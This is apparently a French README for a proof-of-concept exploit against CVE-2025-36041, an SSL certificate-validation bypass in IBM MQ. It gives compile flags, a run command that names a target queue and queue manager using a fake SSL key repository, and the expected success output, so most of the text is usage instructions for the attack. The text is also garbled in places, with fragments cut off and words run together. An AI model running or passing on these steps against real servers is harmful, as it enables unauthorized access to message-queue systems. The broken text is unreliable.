
Exploit (C) de la vulnérabilité CVE-2025-36041 dans IBM MQ
Ce dépôt contient un exploit proof-of-concept (PoC) pour CVE-2025-36041, une vulnérabilité dans IBM MQ (Message Queue) qui permet de contourner la validation des certificats SSL. En injectant un faux certificat SSL et en utilisant des paramètres MQCONNX personnalisés, une connexion client non autorisée à un serveur IBM MQ peut être établie.
"Hello MQ") pour confirmer le succès de l'exploitation.Assurez-vous que les bibliothèques client IBM MQ sont installées et que les variables d'environnement (MQ_INCLUDE_PATH, ) sont définies en conséquence.
MQ_LIB_PATHgcc exploit.c argparse.c -o CVE-2025-36041
-I/path/to/mqm/include
-L/path/to/mqm/lib -lmqm
./CVE-2025-36041
-p /path/to/fake/ssl
-n TARGET.QUEUE.NAME
-m QM1
Paramètres :
-p, --path Chemin vers le répertoire du faux KeyRepository SSL.-n, --name Nom de la file d'attente cible à ouvrir et pour envoyer le message.-m, --qmgr Nom du gestionnaire de files d'attente../CVE-2025-36041 -p ./fake_ssl_repo -n MY.QUEUE -m QM1
En cas de succès, vous verrez :
[+] Starting connection to IBM MQ... [+] Connected successfully with fake SSL! [+] Message sent successfully!
Pour des tests de pénétration autorisés et à des fins éducatives uniquement. Toute utilisation non autorisée de ce PoC peut violer les lois et réglementations locales. L'auteur décline toute responsabilité en cas d'usage abusif.
Auteur : Byte Reaper CVE : CVE-2025-36041